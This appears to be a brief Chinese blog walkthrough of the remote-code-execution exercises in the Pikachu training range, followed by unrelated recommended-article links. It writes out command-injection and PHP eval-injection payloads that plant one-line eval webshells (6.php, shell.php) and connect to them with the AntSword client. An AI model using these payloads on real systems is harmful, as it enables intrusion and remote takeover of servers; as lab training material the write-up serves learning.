Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
Tjohn910 分钟前
阿里云服务器yum install后服务器卡死,无法ssh
服务器·阿里云·ssh
郝学胜-神的一滴13 分钟前
深入解析Linux的`pthread_create`函数:从原理到实践
linux·服务器·c++·程序人生
德迅云安全-小潘14 分钟前
网络威胁演变与态势感知的防御
安全·web安全
yenggd21 分钟前
企业总部-分支-门点-数据中心使用骨干网SRv6 BE互联互通整体架构配置案例
运维·网络·计算机网络·华为·架构
Hello.Reader23 分钟前
Flink SQL CALL 语句调用存储过程做数据操作与运维任务(含 Java 示例 + 避坑指南)
运维·sql·flink
阿豪学编程35 分钟前
【Linux】进程间通信(IPC):从管道到共享内存
linux·运维·服务器
qq75903536635 分钟前
docker一键部署网页版Win11系统
运维·docker·容器
星环处相逢40 分钟前
Ansible-Playbook 剧本编写全攻略:从入门到进阶
linux·服务器·网络
Joren的学习记录42 分钟前
【Linux运维大神系列】docker详解(三)
linux·运维·docker
点灯小铭42 分钟前
基于单片机的汽车防撞安全系统
单片机·安全·汽车·毕业设计·课程设计·期末大作业
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05BongoCat - 跨平台键盘猫动画工具06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07jdk21下载、安装(Windows、Linux、macOS)08Labelme从安装到标注:零基础完整指南09CentOS的ISO镜像下载10Open-AutoGLM Windows 安装部署教程